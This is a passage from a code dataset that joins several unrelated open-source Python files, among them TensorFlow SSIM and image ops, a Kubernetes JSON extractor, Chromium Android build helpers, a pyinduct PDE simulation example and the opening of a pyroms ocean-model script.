      and for the convolutional version, this is usually tf.nn.avg_pool or
tf.nn.conv2d with weighted-sum kernel.
max_val: The dynamic range (i.e., the difference between the maximum
possible allowed value and the minimum allowed value).
compensation: Compensation factor. See above.
Returns:
A pair containing the luminance measure, and the contrast-structure measure.
"""
c1 = (_SSIM_K1 * max_val) ** 2
c2 = (_SSIM_K2 * max_val) ** 2
# SSIM luminance measure is
# (2 * mu_x * mu_y + c1) / (mu_x ** 2 + mu_y ** 2 + c1).
mean0 = reducer(x)
mean1 = reducer(y)
num0 = mean0 * mean1 * 2.0
den0 = math_ops.square(mean0) + math_ops.square(mean1)
luminance = (num0 + c1) / (den0 + c1)
# SSIM contrast-structure measure is
# (2 * cov_{xy} + c2) / (cov_{xx} + cov_{yy} + c2).
  # Note that if `reducer` is a weighted sum with weights w_i, \sum_i w_i = 1, then
# cov_{xy} = \sum_i w_i (x_i - \mu_x) (y_i - \mu_y)
# = \sum_i w_i x_i y_i - (\sum_i w_i x_i) (\sum_j w_j y_j).
num1 = reducer(x * y) * 2.0
den1 = reducer(math_ops.square(x) + math_ops.square(y))
c2 *= compensation
cs = (num1 - num0 + c2) / (den1 - den0 + c2)
# SSIM score is the product of the luminance and contrast-structure measures.
return luminance, cs
def _fspecial_gauss(size, sigma):
"""Function to mimic the 'fspecial' gaussian MATLAB function."""
size = ops.convert_to_tensor(size, dtypes.int32)
sigma = ops.convert_to_tensor(sigma)
coords = math_ops.cast(math_ops.range(size), sigma.dtype)
coords -= math_ops.cast(size - 1, sigma.dtype) / 2.0
g = math_ops.square(coords)
g *= -0.5 / math_ops.square(sigma)
g = array_ops.reshape(g, shape=[1, -1]) + array_ops.reshape(g, shape=[-1, 1])
g = array_ops.reshape(g, shape=[1, -1]) # For tf.nn.softmax().
g = nn_ops.softmax(g)
return array_ops.reshape(g, shape=[size, size, 1, 1])
def _ssim_per_channel(img1, img2, max_val=1.0):
"""Computes SSIM index between img1 and img2 per color channel.
This function matches the standard SSIM implementation from:
Wang, Z., Bovik, A. C., Sheikh, H. R., & Simoncelli, E. P. (2004). Image
quality assessment: from error visibility to structural similarity. IEEE
transactions on image processing.
Details:
- 11x11 Gaussian filter of width 1.5 is used.
- k1 = 0.01, k2 = 0.03 as in the original paper.
Args:
img1: First image batch.
img2: Second image batch.
max_val: The dynamic range of the images (i.e., the difference between the
      maximum and the minimum allowed values).
Returns:
    A pair of tensors containing the channel-wise SSIM and contrast-structure
values. The shape is [..., channels].
"""
filter_size = constant_op.constant(11, dtype=dtypes.int32)
filter_sigma = constant_op.constant(1.5, dtype=img1.dtype)
shape1, shape2 = array_ops.shape_n([img1, img2])
checks = [
control_flow_ops.Assert(math_ops.reduce_all(math_ops.greater_equal(
shape1[-3:-1], filter_size)), [shape1, filter_size], summarize=8),
control_flow_ops.Assert(math_ops.reduce_all(math_ops.greater_equal(
shape2[-3:-1], filter_size)), [shape2, filter_size], summarize=8)]
# Enforce the check to run before computation.
with ops.control_dependencies(checks):
img1 = array_ops.identity(img1)
# TODO(sjhwang): Try to cache kernels and compensation factor.
kernel = _fspecial_gauss(filter_size, filter_sigma)
kernel = array_ops.tile(kernel, multiples=[1, 1, shape1[-1], 1])
# The correct compensation factor is `1.0 - tf.reduce_sum(tf.square(kernel))`,
# but to match MATLAB implementation of MS-SSIM, we use 1.0 instead.
compensation = 1.0
# TODO(sjhwang): Try FFT.
# TODO(sjhwang): Gaussian kernel is separable in space. Consider applying
  #   1-by-n and n-by-1 Gaussian filters instead of an n-by-n filter.
def reducer(x):
shape = array_ops.shape(x)
x = array_ops.reshape(x, shape=array_ops.concat([[-1], shape[-3:]], 0))
y = nn.depthwise_conv2d(x, kernel, strides=[1, 1, 1, 1], padding='VALID')
return array_ops.reshape(y, array_ops.concat([shape[:-3],
array_ops.shape(y)[1:]], 0))
luminance, cs = _ssim_helper(img1, img2, reducer, max_val, compensation)
# Average over the second and the third from the last: height, width.
axes = constant_op.constant([-3, -2], dtype=dtypes.int32)
ssim_val = math_ops.reduce_mean(luminance * cs, axes)
cs = math_ops.reduce_mean(cs, axes)
return ssim_val, cs
@tf_export('image.ssim')
def ssim(img1, img2, max_val):
"""Computes SSIM index between img1 and img2.
This function is based on the standard SSIM implementation from:
Wang, Z., Bovik, A. C., Sheikh, H. R., & Simoncelli, E. P. (2004). Image
quality assessment: from error visibility to structural similarity. IEEE
transactions on image processing.
Note: The true SSIM is only defined on grayscale. This function does not
perform any colorspace transform. (If input is already YUV, then it will
compute YUV SSIM average.)
Details:
- 11x11 Gaussian filter of width 1.5 is used.
- k1 = 0.01, k2 = 0.03 as in the original paper.
The image sizes must be at least 11x11 because of the filter size.
Example:
```python
# Read images from file.
im1 = tf.decode_png('path/to/im1.png')
im2 = tf.decode_png('path/to/im2.png')
# Compute SSIM over tf.uint8 Tensors.
ssim1 = tf.image.ssim(im1, im2, max_val=255)
# Compute SSIM over tf.float32 Tensors.
im1 = tf.image.convert_image_dtype(im1, tf.float32)
im2 = tf.image.convert_image_dtype(im2, tf.float32)
ssim2 = tf.image.ssim(im1, im2, max_val=1.0)
# ssim1 and ssim2 both have type tf.float32 and are almost equal.
```
Args:
img1: First image batch.
img2: Second image batch.
max_val: The dynamic range of the images (i.e., the difference between the
      maximum and the minimum allowed values).
Returns:
A tensor containing an SSIM value for each image in batch. Returned SSIM
values are in range (-1, 1], when pixel values are non-negative. Returns
a tensor with shape: broadcast(img1.shape[:-3], img2.shape[:-3]).
"""
_, _, checks = _verify_compatible_image_shapes(img1, img2)
with ops.control_dependencies(checks):
img1 = array_ops.identity(img1)
# Need to convert the images to float32. Scale max_val accordingly so that
# SSIM is computed correctly.
max_val = math_ops.cast(max_val, img1.dtype)
max_val = convert_image_dtype(max_val, dtypes.float32)
img1 = convert_image_dtype(img1, dtypes.float32)
img2 = convert_image_dtype(img2, dtypes.float32)
ssim_per_channel, _ = _ssim_per_channel(img1, img2, max_val)
# Compute average over color channels.
return math_ops.reduce_mean(ssim_per_channel, [-1])
# Default values obtained by Wang et al.
_MSSSIM_WEIGHTS = (0.0448, 0.2856, 0.3001, 0.2363, 0.1333)
@tf_export('image.ssim_multiscale')
def ssim_multiscale(img1, img2, max_val, power_factors=_MSSSIM_WEIGHTS):
"""Computes the MS-SSIM between img1 and img2.
This function assumes that `img1` and `img2` are image batches, i.e. the last
three dimensions are [height, width, channels].
Note: The true SSIM is only defined on grayscale. This function does not
perform any colorspace transform. (If input is already YUV, then it will
compute YUV SSIM average.)
Original paper: Wang, Zhou, Eero P. Simoncelli, and Alan C. Bovik. "Multiscale
structural similarity for image quality assessment." Signals, Systems and
Computers, 2004.
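  Example (a hedged sketch; `im1` and `im2` are assumed image batches of the
  same shape, large enough for all of the default scales):
  ```python
  im1 = tf.image.convert_image_dtype(im1, tf.float32)
  im2 = tf.image.convert_image_dtype(im2, tf.float32)
  msssim = tf.image.ssim_multiscale(im1, im2, max_val=1.0)
  ```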
Arguments:
img1: First image batch.
img2: Second image batch. Must have the same rank as img1.
max_val: The dynamic range of the images (i.e., the difference between the
      maximum and the minimum allowed values).
power_factors: Iterable of weights for each of the scales. The number of
scales used is the length of the list. Index 0 is the unscaled
resolution's weight and each increasing scale corresponds to the image
being downsampled by 2. Defaults to (0.0448, 0.2856, 0.3001, 0.2363,
0.1333), which are the values obtained in the original paper.
Returns:
A tensor containing an MS-SSIM value for each image in batch. The values
are in range [0, 1]. Returns a tensor with shape:
broadcast(img1.shape[:-3], img2.shape[:-3]).
"""
# Shape checking.
shape1 = img1.get_shape().with_rank_at_least(3)
shape2 = img2.get_shape().with_rank_at_least(3)
shape1[-3:].merge_with(shape2[-3:])
with ops.name_scope(None, 'MS-SSIM', [img1, img2]):
shape1, shape2, checks = _verify_compatible_image_shapes(img1, img2)
with ops.control_dependencies(checks):
img1 = array_ops.identity(img1)
# Need to convert the images to float32. Scale max_val accordingly so that
# SSIM is computed correctly.
max_val = math_ops.cast(max_val, img1.dtype)
max_val = convert_image_dtype(max_val, dtypes.float32)
img1 = convert_image_dtype(img1, dtypes.float32)
img2 = convert_image_dtype(img2, dtypes.float32)
imgs = [img1, img2]
shapes = [shape1, shape2]
# img1 and img2 are assumed to be a (multi-dimensional) batch of
# 3-dimensional images (height, width, channels). `heads` contain the batch
# dimensions, and `tails` contain the image dimensions.
heads = [s[:-3] for s in shapes]
tails = [s[-3:] for s in shapes]
divisor = [1, 2, 2, 1]
divisor_tensor = constant_op.constant(divisor[1:], dtype=dtypes.int32)
def do_pad(images, remainder):
padding = array_ops.expand_dims(remainder, -1)
padding = array_ops.pad(padding, [[1, 0], [1, 0]])
return [array_ops.pad(x, padding, mode='SYMMETRIC') for x in images]
mcs = []
for k in range(len(power_factors)):
with ops.name_scope(None, 'Scale%d' % k, imgs):
if k > 0:
# Avg pool takes rank 4 tensors. Flatten leading dimensions.
flat_imgs = [
array_ops.reshape(x, array_ops.concat([[-1], t], 0))
for x, t in zip(imgs, tails)
]
remainder = tails[0] % divisor_tensor
need_padding = math_ops.reduce_any(math_ops.not_equal(remainder, 0))
# pylint: disable=cell-var-from-loop
padded = control_flow_ops.cond(need_padding,
lambda: do_pad(flat_imgs, remainder),
lambda: flat_imgs)
# pylint: enable=cell-var-from-loop
downscaled = [nn_ops.avg_pool(x, ksize=divisor, strides=divisor,
padding='VALID')
for x in padded]
tails = [x[1:] for x in array_ops.shape_n(downscaled)]
imgs = [
array_ops.reshape(x, array_ops.concat([h, t], 0))
for x, h, t in zip(downscaled, heads, tails)
]
# Overwrite previous ssim value since we only need the last one.
ssim_per_channel, cs = _ssim_per_channel(*imgs, max_val=max_val)
mcs.append(nn_ops.relu(cs))
# Remove the cs score for the last scale. In the MS-SSIM calculation,
# we use the l(p) at the highest scale. l(p) * cs(p) is ssim(p).
mcs.pop() # Remove the cs score for the last scale.
mcs_and_ssim = array_ops.stack(mcs + [nn_ops.relu(ssim_per_channel)],
axis=-1)
# Take weighted geometric mean across the scale axis.
ms_ssim = math_ops.reduce_prod(math_ops.pow(mcs_and_ssim, power_factors),
[-1])
return math_ops.reduce_mean(ms_ssim, [-1]) # Avg over color channels.
@tf_export('image.image_gradients')
def image_gradients(image):
"""Returns image gradients (dy, dx) for each color channel.
Both output tensors have the same shape as the input: [batch_size, h, w,
d]. The gradient values are organized so that [I(x+1, y) - I(x, y)] is in
location (x, y). That means that dy will always have zeros in the last row,
and dx will always have zeros in the last column.
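  Example (a minimal sketch; the all-zero image below is only a placeholder):
  ```python
  image = tf.zeros([1, 4, 4, 1])
  dy, dx = tf.image.image_gradients(image)
  # dy and dx both have shape [1, 4, 4, 1]; dy has a zero last row and dx a
  # zero last column by construction.
  ```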
Arguments:
image: Tensor with shape [batch_size, h, w, d].
Returns:
Pair of tensors (dy, dx) holding the vertical and horizontal image
gradients (1-step finite difference).
Raises:
ValueError: If `image` is not a 4D tensor.
"""
if image.get_shape().ndims != 4:
raise ValueError('image_gradients expects a 4D tensor '
                     '[batch_size, h, w, d], not %s.' % image.get_shape())
image_shape = array_ops.shape(image)
batch_size, height, width, depth = array_ops.unstack(image_shape)
dy = image[:, 1:, :, :] - image[:, :-1, :, :]
dx = image[:, :, 1:, :] - image[:, :, :-1, :]
# Return tensors with same size as original image by concatenating
# zeros. Place the gradient [I(x+1,y) - I(x,y)] on the base pixel (x, y).
shape = array_ops.stack([batch_size, 1, width, depth])
dy = array_ops.concat([dy, array_ops.zeros(shape, image.dtype)], 1)
dy = array_ops.reshape(dy, image_shape)
shape = array_ops.stack([batch_size, height, 1, depth])
dx = array_ops.concat([dx, array_ops.zeros(shape, image.dtype)], 2)
dx = array_ops.reshape(dx, image_shape)
return dy, dx
@tf_export('image.sobel_edges')
def sobel_edges(image):
"""Returns a tensor holding Sobel edge maps.
Arguments:
image: Image tensor with shape [batch_size, h, w, d] and type float32 or
float64. The image(s) must be 2x2 or larger.
Returns:
Tensor holding edge maps for each channel. Returns a tensor with shape
[batch_size, h, w, d, 2] where the last two dimensions hold [[dy[0], dx[0]],
[dy[1], dx[1]], ..., [dy[d-1], dx[d-1]]] calculated using the Sobel filter.
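  Example (a hedged sketch; the all-zero image below is only a placeholder):
  ```python
  image = tf.zeros([1, 28, 28, 3])
  edges = tf.image.sobel_edges(image)  # shape [1, 28, 28, 3, 2]
  dy, dx = edges[..., 0], edges[..., 1]
  ```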
"""
# Define vertical and horizontal Sobel filters.
static_image_shape = image.get_shape()
image_shape = array_ops.shape(image)
kernels = [[[-1, -2, -1], [0, 0, 0], [1, 2, 1]],
[[-1, 0, 1], [-2, 0, 2], [-1, 0, 1]]]
num_kernels = len(kernels)
kernels = np.transpose(np.asarray(kernels), (1, 2, 0))
kernels = np.expand_dims(kernels, -2)
kernels_tf = constant_op.constant(kernels, dtype=image.dtype)
kernels_tf = array_ops.tile(kernels_tf, [1, 1, image_shape[-1], 1],
name='sobel_filters')
# Use depth-wise convolution to calculate edge maps per channel.
pad_sizes = [[0, 0], [1, 1], [1, 1], [0, 0]]
padded = array_ops.pad(image, pad_sizes, mode='REFLECT')
# Output tensor has shape [batch_size, h, w, d * num_kernels].
strides = [1, 1, 1, 1]
output = nn.depthwise_conv2d(padded, kernels_tf, strides, 'VALID')
# Reshape to [batch_size, h, w, d, num_kernels].
shape = array_ops.concat([image_shape, [num_kernels]], 0)
output = array_ops.reshape(output, shape=shape)
output.set_shape(static_image_shape.concatenate([num_kernels]))
return output
resize_area_deprecation = deprecation.deprecated(
date=None,
instructions=(
'Use `tf.image.resize(...method=ResizeMethod.AREA...)` instead.'))
tf_export(v1=['image.resize_area'])(
resize_area_deprecation(gen_image_ops.resize_area))
resize_bicubic_deprecation = deprecation.deprecated(
date=None,
instructions=(
'Use `tf.image.resize(...method=ResizeMethod.BICUBIC...)` instead.'))
tf_export(v1=['image.resize_bicubic'])(
resize_bicubic_deprecation(gen_image_ops.resize_bicubic))
resize_bilinear_deprecation = deprecation.deprecated(
date=None,
instructions=(
'Use `tf.image.resize(...method=ResizeMethod.BILINEAR...)` instead.'))
tf_export(v1=['image.resize_bilinear'])(
resize_bilinear_deprecation(gen_image_ops.resize_bilinear))
resize_nearest_neighbor_deprecation = deprecation.deprecated(
date=None,
instructions=(
'Use `tf.image.resize(...method=ResizeMethod.NEAREST_NEIGHBOR...)` '
'instead.'))
tf_export(v1=['image.resize_nearest_neighbor'])(
resize_nearest_neighbor_deprecation(gen_image_ops.resize_nearest_neighbor))
@tf_export('image.crop_and_resize', v1=[])
def crop_and_resize_v2(
image,
boxes,
box_indices,
crop_size,
method='bilinear',
extrapolation_value=0,
name=None):
"""Extracts crops from the input image tensor and resizes them.
Extracts crops from the input image tensor and resizes them using bilinear
sampling or nearest neighbor sampling (possibly with aspect ratio change) to a
common output size specified by `crop_size`. This is more general than the
`crop_to_bounding_box` op which extracts a fixed size slice from the input
image and does not allow resizing or aspect ratio change.
Returns a tensor with `crops` from the input `image` at positions defined at
the bounding box locations in `boxes`. The cropped boxes are all resized (with
bilinear or nearest neighbor interpolation) to a fixed
`size = [crop_height, crop_width]`. The result is a 4-D tensor
`[num_boxes, crop_height, crop_width, depth]`. The resizing is corner aligned.
In particular, if `boxes = [[0, 0, 1, 1]]`, the method will give identical
results to using `tf.image.resize_bilinear()` or
  `tf.image.resize_nearest_neighbor()` (depending on the `method` argument) with
`align_corners=True`.
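  Example (a hedged sketch; every tensor below is an assumed placeholder):
  ```python
  image = tf.zeros([2, 100, 100, 3])
  boxes = tf.constant([[0.1, 0.1, 0.5, 0.5], [0.2, 0.2, 0.9, 0.9]])
  box_indices = tf.constant([0, 1])
  crops = tf.image.crop_and_resize(image, boxes, box_indices, crop_size=[24, 24])
  # crops has shape [2, 24, 24, 3].
  ```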
Args:
image: A 4-D tensor of shape `[batch, image_height, image_width, depth]`.
Both `image_height` and `image_width` need to be positive.
boxes: A 2-D tensor of shape `[num_boxes, 4]`. The `i`-th row of the tensor
specifies the coordinates of a box in the `box_ind[i]` image and is
specified in normalized coordinates `[y1, x1, y2, x2]`. A normalized
coordinate value of `y` is mapped to the image coordinate at `y *
(image_height - 1)`, so as the `[0, 1]` interval of normalized image
height is mapped to `[0, image_height - 1]` in image height coordinates.
We do allow `y1` > `y2`, in which case the sampled crop is an up-down
flipped version of the original image. The width dimension is treated
similarly. Normalized coordinates outside the `[0, 1]` range are allowed,
in which case we use `extrapolation_value` to extrapolate the input image
values.
box_indices: A 1-D tensor of shape `[num_boxes]` with int32 values in `[0,
batch)`. The value of `box_ind[i]` specifies the image that the `i`-th box
refers to.
crop_size: A 1-D tensor of 2 elements, `size = [crop_height, crop_width]`.
All cropped image patches are resized to this size. The aspect ratio of
the image content is not preserved. Both `crop_height` and `crop_width`
need to be positive.
method: An optional string specifying the sampling method for resizing. It
can be either `"bilinear"` or `"nearest"` and default to `"bilinear"`.
Currently two sampling methods are supported: Bilinear and Nearest
Neighbor.
extrapolation_value: An optional `float`. Defaults to `0`. Value used for
extrapolation, when applicable.
name: A name for the operation (optional).
Returns:
A 4-D tensor of shape `[num_boxes, crop_height, crop_width, depth]`.
"""
return gen_image_ops.crop_and_resize(
image, boxes, box_indices, crop_size, method, extrapolation_value, name)
crop_and_resize_deprecation = deprecation.deprecated_args(
None, 'box_ind is deprecated, use box_indices instead', 'box_ind')
tf_export(v1=['image.crop_and_resize'])(
crop_and_resize_deprecation(gen_image_ops.crop_and_resize))
|
SamuelMarks/kubernetes
|
refs/heads/master
|
build/json-extractor.py
|
413
|
#!/usr/bin/env python
# Copyright 2014 The Kubernetes Authors All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This is a very simple utility that reads a JSON document from stdin, parses it
# and returns the specified value. The value is described using a simple dot
# notation. If any errors are encountered along the way, an error is output and
# a failure value is returned.
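# Example invocation (hypothetical input and query, shown only as a sketch):
#   echo '{"items": [{"name": "etcd"}]}' | json-extractor.py items.0.name
# The query walks obj["items"][0]["name"] and prints the resulting value.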
from __future__ import print_function
import json
import sys
def PrintError(*err):
print(*err, file=sys.stderr)
def main():
try:
obj = json.load(sys.stdin)
  except Exception as e:
    PrintError("Error loading JSON: {0}".format(str(e)))
    # Without a parsed document there is nothing to query.
    return 1
if len(sys.argv) == 1:
# if we don't have a query string, return success
return 0
elif len(sys.argv) > 2:
PrintError("Usage: {0} <json query>".format(sys.args[0]))
return 1
query_list = sys.argv[1].split('.')
for q in query_list:
if isinstance(obj, dict):
if q not in obj:
PrintError("Couldn't find '{0}' in dict".format(q))
return 1
obj = obj[q]
elif isinstance(obj, list):
try:
index = int(q)
      except ValueError:
PrintError("Can't use '{0}' to index into array".format(q))
return 1
if index >= len(obj):
PrintError("Index ({0}) is greater than length of list ({1})".format(q, len(obj)))
return 1
obj = obj[index]
else:
PrintError("Trying to query non-queryable object: {0}".format(q))
return 1
if isinstance(obj, str):
print(obj)
else:
print(json.dumps(obj, indent=2))
if __name__ == "__main__":
sys.exit(main())
|
jswope00/griffinx
|
refs/heads/master
|
pavelib/paver_tests/test_paver_bok_choy_cmds.py
|
8
|
import os
import unittest
from pavelib.utils.test.suites.bokchoy_suite import BokChoyTestSuite
REPO_DIR = os.getcwd()
class TestPaverBokChoyCmd(unittest.TestCase):
def setUp(self):
self.request = BokChoyTestSuite('')
def _expected_command(self, expected_text_append, expected_default_store=None):
if expected_text_append:
expected_text_append = "/" + expected_text_append
expected_statement = ("DEFAULT_STORE={default_store} SCREENSHOT_DIR='{repo_dir}/test_root/log' "
"BOK_CHOY_HAR_DIR='{repo_dir}/test_root/log/hars' "
"SELENIUM_DRIVER_LOG_DIR='{repo_dir}/test_root/log' "
"nosetests {repo_dir}/common/test/acceptance/tests{exp_text} "
"--with-xunit "
"--xunit-file={repo_dir}/reports/bok_choy/xunit.xml "
"--verbosity=2 ".format(default_store=expected_default_store,
repo_dir=REPO_DIR,
exp_text=expected_text_append))
return expected_statement
def test_default_bokchoy(self):
self.assertEqual(self.request.cmd, self._expected_command(''))
def test_suite_request_bokchoy(self):
self.request.test_spec = "test_foo.py"
self.assertEqual(self.request.cmd, self._expected_command(self.request.test_spec))
def test_class_request_bokchoy(self):
self.request.test_spec = "test_foo.py:FooTest"
self.assertEqual(self.request.cmd, self._expected_command(self.request.test_spec))
def test_case_request_bokchoy(self):
self.request.test_spec = "test_foo.py:FooTest.test_bar"
self.assertEqual(self.request.cmd, self._expected_command(self.request.test_spec))
def test_default_bokchoy_with_draft_default_store(self):
self.request.test_spec = "test_foo.py"
self.request.default_store = "draft"
self.assertEqual(self.request.cmd, self._expected_command(self.request.test_spec, "draft"))
def test_default_bokchoy_with_invalid_default_store(self):
# the cmd will dumbly compose whatever we pass in for the default_store
self.request.test_spec = "test_foo.py"
self.request.default_store = "invalid"
self.assertEqual(self.request.cmd, self._expected_command(self.request.test_spec, "invalid"))
|
SaschaMester/delicium
|
refs/heads/master
|
build/android/gyp/pack_relocations.py
|
34
|
#!/usr/bin/env python
#
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Pack relocations in a library (or copy unchanged).
If --enable-packing and --configuration-name=='Release', invoke the
relocation_packer tool to pack the .rel.dyn or .rela.dyn section in the given
library files. This step is inserted after the libraries are stripped.
If --enable-packing is zero, the script copies files verbatim, with no
attempt to pack relocations.
Any library listed in --exclude-packing-list is also copied verbatim,
irrespective of any --enable-packing setting. Typically this would be
'libchromium_android_linker.so'.
"""
import optparse
import os
import shlex
import shutil
import sys
import tempfile
from util import build_utils
def PackLibraryRelocations(android_pack_relocations, library_path, output_path):
shutil.copy(library_path, output_path)
pack_command = [android_pack_relocations, output_path]
build_utils.CheckOutput(pack_command)
def CopyLibraryUnchanged(library_path, output_path):
shutil.copy(library_path, output_path)
def main(args):
args = build_utils.ExpandFileArgs(args)
parser = optparse.OptionParser()
build_utils.AddDepfileOption(parser)
parser.add_option('--clear-dir', action='store_true',
help='If set, the destination directory will be deleted '
'before copying files to it. This is highly recommended to '
'ensure that no stale files are left in the directory.')
parser.add_option('--configuration-name',
default='Release',
help='Gyp configuration name (i.e. Debug, Release)')
parser.add_option('--enable-packing',
choices=['0', '1'],
help=('Pack relocations if 1 and configuration name is \'Release\','
' otherwise plain file copy'))
parser.add_option('--exclude-packing-list',
default='',
help='Names of any libraries explicitly not packed')
parser.add_option('--android-pack-relocations',
help='Path to the relocations packer binary')
parser.add_option('--stripped-libraries-dir',
help='Directory for stripped libraries')
parser.add_option('--packed-libraries-dir',
help='Directory for packed libraries')
parser.add_option('--libraries', action='append',
help='List of libraries')
parser.add_option('--stamp', help='Path to touch on success')
options, _ = parser.parse_args(args)
enable_packing = (options.enable_packing == '1' and
options.configuration_name == 'Release')
exclude_packing_set = set(shlex.split(options.exclude_packing_list))
libraries = []
for libs_arg in options.libraries:
libraries += build_utils.ParseGypList(libs_arg)
if options.clear_dir:
build_utils.DeleteDirectory(options.packed_libraries_dir)
build_utils.MakeDirectory(options.packed_libraries_dir)
for library in libraries:
library_path = os.path.join(options.stripped_libraries_dir, library)
output_path = os.path.join(
options.packed_libraries_dir, os.path.basename(library))
if enable_packing and library not in exclude_packing_set:
PackLibraryRelocations(options.android_pack_relocations,
library_path,
output_path)
else:
CopyLibraryUnchanged(library_path, output_path)
if options.depfile:
build_utils.WriteDepfile(
options.depfile,
libraries + build_utils.GetPythonDependencies())
if options.stamp:
build_utils.Touch(options.stamp)
return 0
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
|
AOSPU/external_chromium_org
|
refs/heads/android-5.0/py3
|
build/android/pylib/perf/cache_control.py
|
8
|
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from pylib import android_commands
from pylib.device import device_utils
class CacheControl(object):
_DROP_CACHES = '/proc/sys/vm/drop_caches'
def __init__(self, device):
# TODO(jbudorick) Remove once telemetry gets switched over.
if isinstance(device, android_commands.AndroidCommands):
device = device_utils.DeviceUtils(device)
self._device = device
def DropRamCaches(self):
"""Drops the filesystem ram caches for performance testing."""
self._device.RunShellCommand('sync', root=True)
self._device.old_interface.SetProtectedFileContents(
CacheControl._DROP_CACHES, '3')
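# Example usage (a hedged sketch; `device` is an assumed DeviceUtils instance):
#   cache_control = CacheControl(device)
#   cache_control.DropRamCaches()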
|
riemarc/pyinduct
|
refs/heads/develop
|
pyinduct/examples/rad_eq_diri_fem.py
|
3
|
import numpy as np
import pyinduct as pi
import pyinduct.parabolic as parabolic
def run(show_plots):
n_fem = 17
T = 1
l = 1
y0 = -1
y1 = 4
param = [1, 0, 0, None, None]
# or try these:
# param = [1, -0.5, -8, None, None] # :)))
a2, a1, a0, _, _ = param
temp_domain = pi.Domain(bounds=(0, T), num=100)
spat_domain = pi.Domain(bounds=(0, l), num=n_fem * 11)
# initial and test functions
nodes = pi.Domain(spat_domain.bounds, num=n_fem)
fem_base = pi.LagrangeFirstOrder.cure_interval(nodes)
act_fem_base = pi.Base(fem_base[-1])
not_act_fem_base = pi.Base(fem_base[1:-1])
vis_fems_base = pi.Base(fem_base)
pi.register_base("act_base", act_fem_base)
pi.register_base("sim_base", not_act_fem_base)
pi.register_base("vis_base", vis_fems_base)
# trajectory
u = parabolic.RadFeedForward(l, T,
param_original=param,
bound_cond_type="dirichlet",
actuation_type="dirichlet",
y_start=y0, y_end=y1)
# weak form
x = pi.FieldVariable("sim_base")
x_dt = x.derive(temp_order=1)
x_dz = x.derive(spat_order=1)
phi = pi.TestFunction("sim_base")
phi_dz = phi.derive(1)
act_phi = pi.ScalarFunction("act_base")
act_phi_dz = act_phi.derive(1)
weak_form = pi.WeakFormulation([
# ... of the homogeneous part of the system
pi.IntegralTerm(pi.Product(x_dt, phi),
limits=spat_domain.bounds),
pi.IntegralTerm(pi.Product(x_dz, phi_dz),
limits=spat_domain.bounds,
scale=a2),
pi.IntegralTerm(pi.Product(x_dz, phi),
limits=spat_domain.bounds,
scale=-a1),
pi.IntegralTerm(pi.Product(x, phi),
limits=spat_domain.bounds,
scale=-a0),
# ... of the inhomogeneous part of the system
pi.IntegralTerm(pi.Product(pi.Product(act_phi, phi),
pi.Input(u, order=1)),
limits=spat_domain.bounds),
pi.IntegralTerm(pi.Product(pi.Product(act_phi_dz, phi_dz),
pi.Input(u)),
limits=spat_domain.bounds,
scale=a2),
pi.IntegralTerm(pi.Product(pi.Product(act_phi_dz, phi),
pi.Input(u)),
limits=spat_domain.bounds,
scale=-a1),
pi.IntegralTerm(pi.Product(pi.Product(act_phi, phi),
pi.Input(u)),
limits=spat_domain.bounds,
scale=-a0)],
name="main_system")
# system matrices \dot x = A x + b0 u + b1 \dot u
cf = pi.parse_weak_formulation(weak_form)
ss = pi.create_state_space(cf)
a_mat = ss.A[1]
b0 = ss.B[0][1]
b1 = ss.B[1][1]
# transformation into \dot \bar x = \bar A \bar x + \bar b u
a_tilde = np.diag(np.ones(a_mat.shape[0]), 0)
a_tilde_inv = np.linalg.inv(a_tilde)
a_bar = (a_tilde @ a_mat) @ a_tilde_inv
b_bar = a_tilde @ (a_mat @ b1) + b0
# simulation
def x0(z):
return 0 + y0 * z
start_func = pi.Function(x0, domain=spat_domain.bounds)
full_start_state = np.array([pi.project_on_base(start_func,
pi.get_base("vis_base")
)]).flatten()
initial_state = full_start_state[1:-1]
start_state_bar = a_tilde @ initial_state - (b1 * u(time=0)).flatten()
ss = pi.StateSpace(a_bar, b_bar, base_lbl="sim", input_handle=u)
sim_temp_domain, sim_weights_bar = pi.simulate_state_space(ss,
start_state_bar,
temp_domain)
# back-transformation
u_vec = np.reshape(u.get_results(sim_temp_domain), (len(temp_domain), 1))
sim_weights = sim_weights_bar @ a_tilde_inv + u_vec @ b1.T
# visualisation
plots = list()
save_pics = False
vis_weights = np.hstack((np.zeros_like(u_vec), sim_weights, u_vec))
eval_d = pi.evaluate_approximation("vis_base",
vis_weights,
sim_temp_domain,
spat_domain,
spat_order=0)
der_eval_d = pi.evaluate_approximation("vis_base",
vis_weights,
sim_temp_domain,
spat_domain,
spat_order=1)
if show_plots:
plots.append(pi.PgAnimatedPlot(eval_d,
labels=dict(left='x(z,t)', bottom='z'),
save_pics=save_pics))
plots.append(pi.PgAnimatedPlot(der_eval_d,
labels=dict(left='x\'(z,t)', bottom='z'),
save_pics=save_pics))
win1 = pi.surface_plot(eval_d, title="x(z,t)")
win2 = pi.surface_plot(der_eval_d, title="x'(z,t)")
# save pics
if save_pics:
path = pi.save_2d_pg_plot(u.get_plot(), 'rad_dirichlet_traj')[1]
win1.gl_widget.grabFrameBuffer().save(path + 'rad_dirichlet_3d_x.png')
win2.gl_widget.grabFrameBuffer().save(path + 'rad_dirichlet_3d_dx.png')
pi.show()
pi.tear_down(("act_base", "sim_base", "vis_base"))
if __name__ == "__main__":
run(True)
|
kshedstrom/pyroms
|
refs/heads/master
|
examples/Arctic_HYCOM/make_bdry_file.py
|
1
|
import matplotlib
matplotlib.use('Agg')
import subprocess
import os
import sys
import commands
import numpy as np
from multiprocessing import Pool
#import pdb
#increase the maximum number of open files allowed
#import resource
#resource.setrlimit(resource.RLIMIT_NOFILE, (3000,-1))
import pyroms
import pyroms_toolbox
from remap_bdry import remap_bdry
from remap_bdry_uv import remap_bdry_uv
lst_year = sys.argv[1:]
data_dir = '/archive/u1/uaf/kate/HYCOM/Svalbard/data/'
dst_dir='./'
lst_file = []
for year in lst_year:
